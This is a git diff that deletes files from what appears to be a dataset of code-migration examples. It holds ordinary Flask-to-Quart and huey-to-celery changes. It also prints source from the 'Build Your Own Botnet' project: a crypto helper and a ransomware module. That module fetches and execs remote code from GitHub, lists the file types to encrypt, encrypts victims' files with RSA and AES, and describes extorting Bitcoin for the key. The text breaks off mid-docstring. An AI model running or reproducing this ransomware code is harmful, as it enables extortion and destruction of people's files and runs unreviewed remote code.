-PROJECTION_HOST_PORT = "PROJECTION_HOST_PORT" - -DATABASE_URL = "DATABASE_URL" -DATABASE_PORT = "DATABASE_PORT" -DATABASE_NAME = "DATABASE_NAME" -DATABASE_REPLICA_SET = "DATABASE_REPLICA_SET" - -DOCUMENT_ID = "_id" -METADATA_DOCUMENT_ID = 0 - -GET = "GET" -POST = "POST" -DELETE = "DELETE" - -MESSAGE_RESULT = "result" -PROJECTION_FILENAME_NAME = "output_filename" -FIELDS_NAME = "fields" - -MESSAGE_CREATED_FILE = "created_file" - -FIRST_ARGUMENT = 0 - -app = Flask(__name__) - - -def collection_database_url( - database_url, database_name, database_filename, database_replica_set -): - return ( - database_url - + "/" - + database_name - + "." - + database_filename - + "?replicaSet=" - + database_replica_set - + "&authSource=admin" - ) - - -@app.route("/projections", methods=[POST]) -def create_projection(): - database = MongoOperations( - os.environ[DATABASE_URL] + "/?replicaSet=" + os.environ[ - DATABASE_REPLICA_SET], - os.environ[DATABASE_PORT], - os.environ[DATABASE_NAME], - ) - - request_validator = ProjectionRequestValidator(database) - - try: - request_validator.projection_filename_validator( - request.json[PROJECTION_FILENAME_NAME] - ) - except Exception as invalid_projection_filename: - return ( - jsonify({MESSAGE_RESULT: invalid_projection_filename.args[ - FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_CONFLICT, - ) - - try: - parent_filename = request.json["input_filename"] - request_validator.filename_validator(parent_filename) - except Exception as invalid_filename: - return ( - jsonify({MESSAGE_RESULT: invalid_filename.args[FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_NOT_ACCEPTABLE, - ) - - try: - request_validator.projection_fields_validator( - parent_filename, request.json[FIELDS_NAME] - ) - except Exception as invalid_fields: - return ( - jsonify({MESSAGE_RESULT: invalid_fields.args[FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_NOT_ACCEPTABLE, - ) - - database_url_input = collection_database_url( - os.environ[DATABASE_URL], - os.environ[DATABASE_NAME], - parent_filename, - os.environ[DATABASE_REPLICA_SET], - ) - - database_url_output = collection_database_url( - os.environ[DATABASE_URL], - os.environ[DATABASE_NAME], - request.json[PROJECTION_FILENAME_NAME], - os.environ[DATABASE_REPLICA_SET], - ) - - spark_manager = SparkManager(database_url_input, database_url_output) - - projection_fields = request.json[FIELDS_NAME] - - projection_fields.append(DOCUMENT_ID) - - spark_manager.projection( - parent_filename, request.json[PROJECTION_FILENAME_NAME], - projection_fields - ) - - return ( - jsonify({MESSAGE_RESULT: MESSAGE_CREATED_FILE}), - HTTP_STATUS_CODE_SUCESS_CREATED, - ) - - -if __name__ == "__main__": - app.run( - host=os.environ[PROJECTION_HOST_IP], - port=int(os.environ[PROJECTION_HOST_PORT]) - ) diff --git a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.target.py b/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.target.py deleted file mode 100644 index 6d4a237..0000000 --- a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.target.py +++ /dev/null @@ -1,127 +0,0 @@ -from quart import jsonify, request, Quart -import os -from projection import SparkManager, MongoOperations, \ - ProjectionRequestValidator - -HTTP_STATUS_CODE_SUCESS_CREATED = 201 -HTTP_STATUS_CODE_CONFLICT = 409 -HTTP_STATUS_CODE_NOT_ACCEPTABLE = 406 - -PROJECTION_HOST_IP = "PROJECTION_HOST_IP" -PROJECTION_HOST_PORT = "PROJECTION_HOST_PORT" - -DATABASE_URL = "DATABASE_URL" -DATABASE_PORT = "DATABASE_PORT" -DATABASE_NAME = "DATABASE_NAME" -DATABASE_REPLICA_SET = "DATABASE_REPLICA_SET" - -DOCUMENT_ID = "_id" -METADATA_DOCUMENT_ID = 0 - -GET = "GET" -POST = "POST" -DELETE = "DELETE" - -MESSAGE_RESULT = "result" -PROJECTION_FILENAME_NAME = "output_filename" -FIELDS_NAME = "fields" - -MESSAGE_CREATED_FILE = "created_file" - -FIRST_ARGUMENT = 0 - -app = Quart(__name__) - - -def collection_database_url( - database_url, database_name, database_filename, database_replica_set -): - return ( - database_url - + "/" - + database_name - + "." - + database_filename - + "?replicaSet=" - + database_replica_set - + "&authSource=admin" - ) - - -@app.route("/projections", methods=[POST]) -async def create_projection(): - database = MongoOperations( - os.environ[DATABASE_URL] + "/?replicaSet=" + os.environ[ - DATABASE_REPLICA_SET], - os.environ[DATABASE_PORT], - os.environ[DATABASE_NAME], - ) - - request_validator = ProjectionRequestValidator(database) - - try: - request_validator.projection_filename_validator( - request.json[PROJECTION_FILENAME_NAME] - ) - except Exception as invalid_projection_filename: - return ( - jsonify({MESSAGE_RESULT: invalid_projection_filename.args[ - FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_CONFLICT, - ) - - try: - parent_filename = request.json["input_filename"] - request_validator.filename_validator(parent_filename) - except Exception as invalid_filename: - return ( - jsonify({MESSAGE_RESULT: invalid_filename.args[FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_NOT_ACCEPTABLE, - ) - - try: - request_validator.projection_fields_validator( - parent_filename, request.json[FIELDS_NAME] - ) - except Exception as invalid_fields: - return ( - jsonify({MESSAGE_RESULT: invalid_fields.args[FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_NOT_ACCEPTABLE, - ) - - database_url_input = collection_database_url( - os.environ[DATABASE_URL], - os.environ[DATABASE_NAME], - parent_filename, - os.environ[DATABASE_REPLICA_SET], - ) - - database_url_output = collection_database_url( - os.environ[DATABASE_URL], - os.environ[DATABASE_NAME], - request.json[PROJECTION_FILENAME_NAME], - os.environ[DATABASE_REPLICA_SET], - ) - - spark_manager = SparkManager(database_url_input, database_url_output) - - projection_fields = request.json[FIELDS_NAME] - - projection_fields.append(DOCUMENT_ID) - - await spark_manager.projection( - parent_filename, request.json[PROJECTION_FILENAME_NAME], - projection_fields - ) - - return ( - jsonify({MESSAGE_RESULT: MESSAGE_CREATED_FILE}), - HTTP_STATUS_CODE_SUCESS_CREATED, - ) - - -if __name__ == "__main__": - app.run( - host=os.environ[PROJECTION_HOST_IP], - port=int(os.environ[PROJECTION_HOST_PORT]) - ) diff --git a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.diff b/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.diff deleted file mode 100644 index 0099026..0000000 --- a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/submission/tasks.py b/submission/tasks.py - index 84d390362bafc8a369cfa917b6ed43eabaddb610..b687d2067b28f6759a47ddcfe7bb575e8f83f679 100644 - --- a/submission/tasks.py - +++ b/submission/tasks.py -@@ -1,9 +1,9 @@ - # coding=utf-8 --from huey.djhuey import db_task -- -+from __future__ import absolute_import -+from celery import shared_task - from judge_dispatcher.tasks import JudgeDispatcher - - --@db_task() --def _judge(submission, time_limit, memory_limit, test_case_id, is_waiting_task=False): -- JudgeDispatcher(submission, time_limit, memory_limit, test_case_id).judge(is_waiting_task) -\ No newline at end of file -+@shared_task -+def _judge(submission, time_limit, memory_limit, test_case_id): -+ JudgeDispatcher(submission, time_limit, memory_limit, test_case_id).judge() -\ No newline at end of file diff --git a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.source.py b/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.source.py deleted file mode 100644 index 0e958e7..0000000 --- a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.source.py +++ /dev/null @@ -1,9 +0,0 @@ -# coding=utf-8 -from huey.djhuey import db_task - -from judge_dispatcher.tasks import JudgeDispatcher - - -@db_task() -def _judge(submission, time_limit, memory_limit, test_case_id, is_waiting_task=False): - JudgeDispatcher(submission, time_limit, memory_limit, test_case_id).judge(is_waiting_task) \ No newline at end of file diff --git a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.target.py b/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.target.py deleted file mode 100644 index 4267841..0000000 --- a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.target.py +++ /dev/null @@ -1,9 +0,0 @@ -# coding=utf-8 -from __future__ import absolute_import -from celery import shared_task -from judge_dispatcher.tasks import JudgeDispatcher - - -@shared_task -def _judge(submission, time_limit, memory_limit, test_case_id): - JudgeDispatcher(submission, time_limit, memory_limit, test_case_id).judge() \ No newline at end of file diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.diff b/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.diff deleted file mode 100644 index d8bf3cf..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.diff +++ /dev/null @@ -1,56 +0,0 @@ -diff --git a/byob/core/security.py b/byob/core/security.py - index e7d21501055ea9db3d37f5a96059534b29bdbe2d..9291b54ed6a1c727030c571a6ebdf7b344781c8f 100644 - --- a/byob/core/security.py - +++ b/byob/core/security.py -@@ -17,10 +17,10 @@ import StringIO - - # packages - try: -- import Crypto.Util.number -- import Crypto.Cipher.AES -- import Crypto.Hash.HMAC -- import Crypto.Hash.SHA256 -+ import Cryptodome.Util.number -+ import Cryptodome.Cipher.AES -+ import Cryptodome.Hash.HMAC -+ import Cryptodome.Hash.SHA256 - except ImportError: - pass - -@@ -38,12 +38,12 @@ def diffiehellman(connection): - if isinstance(connection, socket.socket): - g = 2 - p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF -- a = Crypto.Util.number.bytes_to_long(os.urandom(32)) -+ a = Cryptodome.Util.number.bytes_to_long(os.urandom(32)) - xA = pow(g, a, p) -- connection.send(Crypto.Util.number.long_to_bytes(xA)) -- xB = Crypto.Util.number.bytes_to_long(connection.recv(256)) -+ connection.send(Cryptodome.Util.number.long_to_bytes(xA)) -+ xB = Cryptodome.Util.number.bytes_to_long(connection.recv(256)) - x = pow(xB, a, p) -- return Crypto.Hash.SHA256.new(Crypto.Util.number.long_to_bytes(x)).digest() -+ return Cryptodome.Hash.SHA256.new(Cryptodome.Util.number.long_to_bytes(x)).digest() - else: - raise TypeError("argument 'connection' must be type '{}'".format(socket.socket)) - -@@ -61,7 +61,7 @@ def encrypt_aes(plaintext, key, padding=chr(0)): - Returns encrypted ciphertext as base64-encoded string - - """ -- cipher = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_OCB) -+ cipher = Cryptodome.Cipher.AES.new(key, Cryptodome.Cipher.AES.MODE_OCB) - ciphertext, tag = cipher.encrypt_and_digest(plaintext) - output = b''.join((cipher.nonce, tag, ciphertext)) - return base64.b64encode(output) -@@ -81,8 +81,8 @@ def decrypt_aes(ciphertext, key, padding=chr(0)): - - """ - data = StringIO.StringIO(base64.b64decode(ciphertext)) -- nonce, tag, ciphertext = [ data.read(x) for x in (Crypto.Cipher.AES.block_size - 1, Crypto.Cipher.AES.block_size, -1) ] -- cipher = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_OCB, nonce) -+ nonce, tag, ciphertext = [ data.read(x) for x in (Cryptodome.Cipher.AES.block_size - 1, Cryptodome.Cipher.AES.block_size, -1) ] -+ cipher = Cryptodome.Cipher.AES.new(key, Cryptodome.Cipher.AES.MODE_OCB, nonce) - return cipher.decrypt_and_verify(ciphertext, tag) - - def encrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.source.py b/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.source.py deleted file mode 100644 index 2b3ed41..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.source.py +++ /dev/null @@ -1,157 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -'Security (Build Your Own Botnet)' - -# standard library -import os -import sys -import imp -import json -import struct -import base64 -import socket -import urllib -import logging -import tempfile -import StringIO - -# packages -try: - import Crypto.Util.number - import Crypto.Cipher.AES - import Crypto.Hash.HMAC - import Crypto.Hash.SHA256 -except ImportError: - pass - -# main -def diffiehellman(connection): - """ - Diffie-Hellman Internet Key Exchange (RFC 2741) - - `Requires` - :param socket connection: socket.socket object - - Returns the 256-bit binary digest of the SHA256 hash - of the shared session encryption key - """ - if isinstance(connection, socket.socket): - g = 2 - p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF - a = Crypto.Util.number.bytes_to_long(os.urandom(32)) - xA = pow(g, a, p) - connection.send(Crypto.Util.number.long_to_bytes(xA)) - xB = Crypto.Util.number.bytes_to_long(connection.recv(256)) - x = pow(xB, a, p) - return Crypto.Hash.SHA256.new(Crypto.Util.number.long_to_bytes(x)).digest() - else: - raise TypeError("argument 'connection' must be type '{}'".format(socket.socket)) - -def encrypt_aes(plaintext, key, padding=chr(0)): - """ - AES-256-OCB encryption - - `Requires` - :param str plaintext: plain text/data - :param str key: session encryption key - - `Optional` - :param str padding: default: (null byte) - - Returns encrypted ciphertext as base64-encoded string - - """ - cipher = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_OCB) - ciphertext, tag = cipher.encrypt_and_digest(plaintext) - output = b''.join((cipher.nonce, tag, ciphertext)) - return base64.b64encode(output) - -def decrypt_aes(ciphertext, key, padding=chr(0)): - """ - AES-256-OCB decryption - - `Requires` - :param str ciphertext: encrypted block of data - :param str key: session encryption key - - `Optional` - :param str padding: default: (null byte) - - Returns decrypted plaintext as string - - """ - data = StringIO.StringIO(base64.b64decode(ciphertext)) - nonce, tag, ciphertext = [ data.read(x) for x in (Crypto.Cipher.AES.block_size - 1, Crypto.Cipher.AES.block_size, -1) ] - cipher = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_OCB, nonce) - return cipher.decrypt_and_verify(ciphertext, tag) - -def encrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): - """ - XOR-128 encryption - - `Required` - :param str data: plaintext - :param str key: 256-bit key - - `Optional` - :param int block_size: block size - :param int key_size: key size - :param int num_rounds: number of rounds - :param str padding: padding character - - Returns encrypted ciphertext as base64-encoded string - - """ - data = bytes(data) + (int(block_size) - len(bytes(data)) % int(block_size)) * bytes(padding) - blocks = [data[i * block_size:((i + 1) * block_size)] for i in range(len(data) // block_size)] - vector = os.urandom(8) - result = [vector] - for block in blocks: - block = bytes().join(chr(ord(x) ^ ord(y)) for x, y in zip(vector, block)) - v0, v1 = struct.unpack("!2L", block) - k = struct.unpack("!4L", key[:key_size]) - sum, delta, mask = 0L, 0x9e3779b9L, 0xffffffffL - for round in range(num_rounds): - v0 = (v0 + (((v1 << 4 ^ v1 >> 5) + v1) ^ (sum + k[sum & 3]))) & mask - sum = (sum + delta) & mask - v1 = (v1 + (((v0 << 4 ^ v0 >> 5) + v0) ^ (sum + k[sum >> 11 & 3]))) & mask - output = vector = struct.pack("!2L", v0, v1) - result.append(output) - return base64.b64encode(bytes().join(result)) - -def decrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): - """ - XOR-128 encryption - - `Required` - :param str data: ciphertext - :param str key: 256-bit key - - `Optional` - :param int block_size: block size - :param int key_size: key size - :param int num_rounds: number of rounds - :param str padding: padding character - - Returns decrypted plaintext as string - - """ - data = base64.b64decode(data) - blocks = [data[i * block_size:((i + 1) * block_size)] for i in range(len(data) // block_size)] - vector = blocks[0] - result = [] - for block in blocks[1:]: - v0, v1 = struct.unpack("!2L", block) - k0 = struct.unpack("!4L", key[:key_size]) - delta, mask = 0x9e3779b9L, 0xffffffffL - sum = (delta * num_rounds) & mask - for round in range(num_rounds): - v1 = (v1 - (((v0 << 4 ^ v0 >> 5) + v0) ^ (sum + k0[sum >> 11 & 3]))) & mask - sum = (sum - delta) & mask - v0 = (v0 - (((v1 << 4 ^ v1 >> 5) + v1) ^ (sum + k0[sum & 3]))) & mask - decode = struct.pack("!2L", v0, v1) - output = str().join(chr(ord(x) ^ ord(y)) for x, y in zip(vector, decode)) - vector = block - result.append(output) - return str().join(result).rstrip(padding) - diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.target.py b/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.target.py deleted file mode 100644 index 505fef0..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.target.py +++ /dev/null @@ -1,157 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -'Security (Build Your Own Botnet)' - -# standard library -import os -import sys -import imp -import json -import struct -import base64 -import socket -import urllib -import logging -import tempfile -import StringIO - -# packages -try: - import Cryptodome.Util.number - import Cryptodome.Cipher.AES - import Cryptodome.Hash.HMAC - import Cryptodome.Hash.SHA256 -except ImportError: - pass - -# main -def diffiehellman(connection): - """ - Diffie-Hellman Internet Key Exchange (RFC 2741) - - `Requires` - :param socket connection: socket.socket object - - Returns the 256-bit binary digest of the SHA256 hash - of the shared session encryption key - """ - if isinstance(connection, socket.socket): - g = 2 - p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF - a = Cryptodome.Util.number.bytes_to_long(os.urandom(32)) - xA = pow(g, a, p) - connection.send(Cryptodome.Util.number.long_to_bytes(xA)) - xB = Cryptodome.Util.number.bytes_to_long(connection.recv(256)) - x = pow(xB, a, p) - return Cryptodome.Hash.SHA256.new(Cryptodome.Util.number.long_to_bytes(x)).digest() - else: - raise TypeError("argument 'connection' must be type '{}'".format(socket.socket)) - -def encrypt_aes(plaintext, key, padding=chr(0)): - """ - AES-256-OCB encryption - - `Requires` - :param str plaintext: plain text/data - :param str key: session encryption key - - `Optional` - :param str padding: default: (null byte) - - Returns encrypted ciphertext as base64-encoded string - - """ - cipher = Cryptodome.Cipher.AES.new(key, Cryptodome.Cipher.AES.MODE_OCB) - ciphertext, tag = cipher.encrypt_and_digest(plaintext) - output = b''.join((cipher.nonce, tag, ciphertext)) - return base64.b64encode(output) - -def decrypt_aes(ciphertext, key, padding=chr(0)): - """ - AES-256-OCB decryption - - `Requires` - :param str ciphertext: encrypted block of data - :param str key: session encryption key - - `Optional` - :param str padding: default: (null byte) - - Returns decrypted plaintext as string - - """ - data = StringIO.StringIO(base64.b64decode(ciphertext)) - nonce, tag, ciphertext = [ data.read(x) for x in (Cryptodome.Cipher.AES.block_size - 1, Cryptodome.Cipher.AES.block_size, -1) ] - cipher = Cryptodome.Cipher.AES.new(key, Cryptodome.Cipher.AES.MODE_OCB, nonce) - return cipher.decrypt_and_verify(ciphertext, tag) - -def encrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): - """ - XOR-128 encryption - - `Required` - :param str data: plaintext - :param str key: 256-bit key - - `Optional` - :param int block_size: block size - :param int key_size: key size - :param int num_rounds: number of rounds - :param str padding: padding character - - Returns encrypted ciphertext as base64-encoded string - - """ - data = bytes(data) + (int(block_size) - len(bytes(data)) % int(block_size)) * bytes(padding) - blocks = [data[i * block_size:((i + 1) * block_size)] for i in range(len(data) // block_size)] - vector = os.urandom(8) - result = [vector] - for block in blocks: - block = bytes().join(chr(ord(x) ^ ord(y)) for x, y in zip(vector, block)) - v0, v1 = struct.unpack("!2L", block) - k = struct.unpack("!4L", key[:key_size]) - sum, delta, mask = 0L, 0x9e3779b9L, 0xffffffffL - for round in range(num_rounds): - v0 = (v0 + (((v1 << 4 ^ v1 >> 5) + v1) ^ (sum + k[sum & 3]))) & mask - sum = (sum + delta) & mask - v1 = (v1 + (((v0 << 4 ^ v0 >> 5) + v0) ^ (sum + k[sum >> 11 & 3]))) & mask - output = vector = struct.pack("!2L", v0, v1) - result.append(output) - return base64.b64encode(bytes().join(result)) - -def decrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): - """ - XOR-128 encryption - - `Required` - :param str data: ciphertext - :param str key: 256-bit key - - `Optional` - :param int block_size: block size - :param int key_size: key size - :param int num_rounds: number of rounds - :param str padding: padding character - - Returns decrypted plaintext as string - - """ - data = base64.b64decode(data) - blocks = [data[i * block_size:((i + 1) * block_size)] for i in range(len(data) // block_size)] - vector = blocks[0] - result = [] - for block in blocks[1:]: - v0, v1 = struct.unpack("!2L", block) - k0 = struct.unpack("!4L", key[:key_size]) - delta, mask = 0x9e3779b9L, 0xffffffffL - sum = (delta * num_rounds) & mask - for round in range(num_rounds): - v1 = (v1 - (((v0 << 4 ^ v0 >> 5) + v0) ^ (sum + k0[sum >> 11 & 3]))) & mask - sum = (sum - delta) & mask - v0 = (v0 - (((v1 << 4 ^ v1 >> 5) + v1) ^ (sum + k0[sum & 3]))) & mask - decode = struct.pack("!2L", v0, v1) - output = str().join(chr(ord(x) ^ ord(y)) for x, y in zip(vector, decode)) - vector = block - result.append(output) - return str().join(result).rstrip(padding) - diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.diff b/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.diff deleted file mode 100644 index 69e1f5c..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.diff +++ /dev/null @@ -1,65 +0,0 @@ -diff --git a/byob/modules/ransom.py b/byob/modules/ransom.py - index e7d21501055ea9db3d37f5a96059534b29bdbe2d..9291b54ed6a1c727030c571a6ebdf7b344781c8f 100644 - --- a/byob/modules/ransom.py - +++ b/byob/modules/ransom.py -@@ -18,7 +18,7 @@ exec compile(urllib.urlopen('https://raw.githubusercontent.com/colental/byob/mas - sys.modules['util'] = util - - # globals --packages = ['_winreg','Crypto.PublicKey.RSA','Crypto.Cipher.PKCS1_OAEP'] -+packages = ['_winreg','Cryptodome.PublicKey.RSA','Cryptodome.Cipher.PKCS1_OAEP'] - platforms = ['win32'] - threads = {} - tasks = Queue.Queue() -@@ -65,14 +65,14 @@ def _threader(tasks): - @util.threaded - def _iter_files(rsa_key, base_dir=None): - try: -- if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): -+ if isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): - if base_dir: - if os.path.isdir(base_dir): - return os.path.walk(base_dir, lambda _, dirname, files: [globals()['tasks'].put_nowait((encrypt_file, (os.path.join(dirname, filename), rsa_key))) for filename in files], None) - else: - util.log("Target directory '{}' not found".format(base_dir)) - else: -- cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) -+ cipher = Cryptodome.Cipher.PKCS1_OAEP.new(rsa_key) - reg_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, globals()['_registry_key'], 0, _winreg.KEY_READ) - i = 0 - while True: -@@ -128,9 +128,9 @@ def encrypt_file(filename, rsa_key): - try: - if os.path.isfile(filename): - if os.path.splitext(filename)[1] in globals()['filetypes']: -- if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): -- cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) -- aes_key = Crypto.Random.get_random_bytes(32) -+ if isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): -+ cipher = Cryptodome.Cipher.PKCS1_OAEP.new(rsa_key) -+ aes_key = Cryptodome.Random.get_random_bytes(32) - with open(filename, 'rb') as fp: - data = fp.read() - ciphertext = security.encrypt_aes(data, aes_key) -@@ -184,8 +184,8 @@ def encrypt_files(args): - try: - target, _, rsa_key = args.partition(' ') - if os.path.exists(target): -- if not isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): -- rsa_key = Crypto.PublicKey.RSA.importKey(rsa_key) -+ if not isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): -+ rsa_key = Cryptodome.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.can_encrypt(): - return "Error: RSA key cannot encrypt" - if os.path.isfile(target): -@@ -209,8 +209,8 @@ def decrypt_files(rsa_key): - - """ - try: -- if not isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): -- rsa_key = Crypto.PublicKey.RSA.importKey(rsa_key) -+ if not isinstance(rsa_key, Cryptodome.PublicKey.RSA.RsaKey): -+ rsa_key = Cryptodome.PublicKey.RSA.importKey(rsa_key) - if not rsa_key.has_private(): - return "Error: RSA key cannot decrypt" - globals()['threads']['iter-files'] = _iter_files(rsa_key) diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.source.py b/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.source.py deleted file mode 100644 index 6305b92..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$modules$ransom.py.source.py +++ /dev/null @@ -1,239 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -'Ransom (Build Your Own Botnet)' - -# standard library -import os -import sys -import imp -import json -import Queue -import base64 -import urllib -import threading - -# utilities -util = imp.new_module('util') -exec compile(urllib.urlopen('https://raw.githubusercontent.com/colental/byob/master/byob/core/util.py').read(), 'https://raw.githubusercontent.com/colental/byob/master/byob/core/util.py', 'exec') in util.__dict__ -sys.modules['util'] = util - -# globals -packages = ['_winreg','Crypto.PublicKey.RSA','Crypto.Cipher.PKCS1_OAEP'] -platforms = ['win32'] -threads = {} -tasks = Queue.Queue() -filetypes = ['.pdf','.zip','.ppt','.doc','.docx','.rtf','.jpg','.jpeg','.png','.img','.gif','.mp3','.mp4','.mpeg', - '.mov','.avi','.wmv','.rtf','.txt','.html','.php','.js','.css','.odt', '.ods', '.odp', '.odm', '.odc', - '.odb', '.doc', '.docx', '.docm', '.wps', '.xls', '.xlsx', '.xlsm', '.xlsb', '.xlk', '.ppt', '.pptx', - '.pptm', '.mdb', '.accdb', '.pst', '.dwg', '.dxf', '.dxg', '.wpd', '.rtf', '.wb2', '.mdf', '.dbf', - '.psd', '.pdd', '.pdf', '.eps', '.ai', '.indd', '.cdr', '.jpe', '.jpeg','.tmp','.log','.py', - '.dng', '.3fr', '.arw', '.srf', '.sr2', '.bay', '.crw', '.cr2', '.dcr', '.rwl', '.rw2','.pyc', - '.kdc', '.erf', '.mef', '.mrw', '.nef', '.nrw', '.orf', '.raf', '.raw', '.r3d', '.ptx','.css', - '.pef', '.srw', '.x3f', '.der', '.cer', '.crt', '.pem', '.pfx', '.p12', '.p7b', '.p7c','.html', - '.css','.js','.rb','.xml','.wmi','.sh','.asp','.aspx','.plist','.sql','.vbs','.ps1','.sqlite'] -usage = 'ransom ' -description = """ -Encrypt the files on a client host machine and ransom the decryption key -back to the currently logged-in user for a payment in Bitcoin to a randomly -generated temporary wallet address that expires in 12 hours -""" - -# setup -if util.is_compatible(platforms, __name__): - util.imports(packages, globals()) - -# main -def _threader(tasks): - try: - retries = 0 - while True: - try: - method, task = tasks.get_nowait() - if callable(method): - method(task) - tasks.task_done() - except: - if retries < 3: - retries += 1 - time.sleep(1) - continue - else: - break - except Exception as e: - util.log("{} error: {}".format(_threader.func_name, str(e))) - -@util.threaded -def _iter_files(rsa_key, base_dir=None): - try: - if isinstance(rsa_key, Crypto.PublicKey.RSA.RsaKey): - if base_dir: - if os.path.isdir(base_dir): - return os.path.walk(base_dir, lambda _, dirname, files: [globals()['tasks'].put_nowait((encrypt_file, (os.path.join(dirname, filename), rsa_key))) for filename in files], None) - else: - util.log("Target directory '{}' not found".format(base_dir)) - else: - cipher = Crypto.Cipher.PKCS1_OAEP.new(rsa_key) - reg_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, globals()['_registry_key'], 0, _winreg.KEY_READ) - i = 0 - while True: - try: - filename, key, _ = _winreg.EnumValue(reg_key, i) - key = cipher.decrypt(base64.b64decode(key)) - globals()['tasks'].put_nowait((decrypt_file, (filename, key))) - i += 1 - except: - _winreg.CloseKey(reg_key) - break - except Exception as e: - util.log('{} error: {}'.format(_iter_files.func_name, str(e))) - - -def request_payment(bitcoin_wallet, text=None, title=None): - """ - Request ransom payment from user with a Windows alert message box - - `Required` - :param str bitcoin_wallet: a valid 